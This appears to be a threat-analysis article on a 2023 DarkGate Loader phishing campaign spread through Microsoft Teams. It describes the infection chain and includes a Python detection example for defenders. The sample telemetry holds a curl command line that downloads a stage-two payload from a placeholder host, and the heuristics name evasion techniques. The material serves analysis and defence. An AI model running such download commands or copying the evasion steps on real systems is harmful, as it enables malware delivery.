In the ever-evolving world of cyber security, the late August of 2023 marked the emergence of a noteworthy phishing campaign leveraging Microsoft Teams messages. This campaign targeted various organizations through malicious attachments delivering the DarkGate Loader malware. Through this article, we aim to provide a detailed analysis of the technical facets of this attack, explore its connections to previous incidents, and offer informed recommendations for securing Microsoft Teams against similar threats.

Dissecting the DarkGate Malware Phishing Campaign

At the onset of the campaign, attackers compromised external Office 365 accounts to distribute phishing messages via Microsoft Teams. These messages lured users into downloading a ZIP file which was titled “Changes to the vacation schedule”. This seemingly innocent attachment masked a sinister intent, as clicking on it initiated a download process from a SharePoint URL which harboured a malicious LNK file disguised as a PDF document.

What followed was a complex sequence of events. To elucidate, let’s break down the subsequent stages of this malicious attack into detailed sections.

Phase 1: Initiating the Malware Download

Upon clicking the disguised attachment, a sophisticated infection chain was triggered, spearheaded by a malicious VBScript identified by Truesec researchers. This script functioned as the precursor to the DarkGate Loader infiltration. It utilized the cURL binary shipped with Windows to download the malware, a living-off-the-land choice that circumvents detection mechanisms often found in corporate security systems. This phase embodies the initial step in the campaign, paving the way for further exploitation.

Phase 2: Employing Evasion Tactics

The script in question arrived pre-compiled, a tactic deployed to obscure its malicious code. This was achieved using the “magic bytes” associated with compiled AutoIt scripts, AutoIt being a scripting language designed to automate the Windows GUI and general scripting tasks. The script then undertook a preliminary check for the presence of Sophos antivirus software, a reputable protective layer in cybersecurity. Based on the result of this check, the script adapted its behavior, indicating a high level of sophistication in its evasion tactics.

Phase 3: Launching the Shellcode

After adapting to the security environment, the script proceeded to launch the shellcode. This portion of the code utilized “stacked strings” to craft the DarkGate Windows executable, subsequently loading it into the system memory. This tactic represents a crucial phase in the infiltration process, demonstrating the malware’s capability to integrate deeply within the system.
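Defenders can turn the chain described in Phases 1 to 3 into concrete detection logic. The following is an added example, not code from the article or from Truesec: it runs two heuristics over constructed process-creation events and a constructed file buffer. The `AU3!EA06` marker is a documented signature of compiled AutoIt v3 scripts and is an assumption taken from outside this article; the double-extension filename check assumes the LNK was disguised by its name, which the article does not state explicitly.

```python
from dataclasses import dataclass

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}   # Windows script hosts that run VBScript
AUTOIT_MARKER = b"AU3!EA06"                     # compiled AutoIt v3 signature (assumption)
DOC_EXTENSIONS = ("pdf", "docx", "xlsx")

@dataclass(frozen=True)
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str

def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]

def is_script_host_curl(event: ProcessEvent) -> bool:
    """Phase 1 pattern: a script host launches curl.exe with a remote URL."""
    return (_basename(event.parent_image) in SCRIPT_HOSTS
            and _basename(event.image) == "curl.exe"
            and "http" in event.command_line.lower())

def is_disguised_lnk(filename: str) -> bool:
    """A .lnk whose name carries a document-looking inner extension (e.g. x.pdf.lnk)."""
    name = filename.lower()
    return any(name.endswith(f".{ext}.lnk") for ext in DOC_EXTENSIONS)

def looks_like_compiled_autoit(data: bytes) -> bool:
    """Phase 2 pattern: the payload carries the compiled-AutoIt marker bytes."""
    return AUTOIT_MARKER in data

def find_suspicious(events):
    """Return the events matching the script-host-to-curl rule."""
    return [e for e in events if is_script_host_curl(e)]

# Constructed sample telemetry: one benign cmd launch, one matching the Phase 1
# chain, one curl launch from cmd.exe that the rule should ignore.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),
    ProcessEvent(r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\curl.exe",
                 "curl.exe -o C:\\Users\\Public\\stage2.bin http://example.invalid/stage2"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\curl.exe",
                 "curl.exe https://example.invalid/healthcheck"),
]

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS):
        print("ALERT script host -> curl:", hit.command_line)
    print("disguised LNK:", is_disguised_lnk("Changes to the vacation schedule.pdf.lnk"))
```

In a real deployment the same rules map naturally onto Sysmon Event ID 1 or EDR process telemetry, with the parent/child pair keyed on image name rather than full path.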

Connecting Past Incidents and Microsoft’s Standpoint

Remarkably, this is not an isolated event. A growing trend of exploiting compromised Microsoft Teams accounts for disseminating malicious attachments has been documented. This method of attack was highlighted previously in a June 2023 report published by Jumpsec. Despite this, it seems Microsoft has yet to address this escalating concern, instead advising users to employ security measures such as implementing narrow-scoped allow-lists and restricting external access unless absolutely required. Furthermore, a tool facilitating Microsoft Teams phishing attacks was released in July 2023 by a Red Teamer, although it seems to remain unconnected to the current campaign.

Recommendations for Safeguarding Microsoft Teams

In the face of these increasing threats, it is paramount for organizations to adopt proactive strategies to protect their Microsoft Teams environments. A few recommended approaches include narrowing the scope of allow-lists to limit potential threats and disabling unnecessary external access, thus creating a more secure operational sphere.

In conclusion, the DarkGate malware phishing campaign presents a significant threat to organizational security. By understanding its complex workings and adopting suggested protective measures, it is possible to build a fortified line of defense against potential future attacks, fostering a safer digital environment for all.
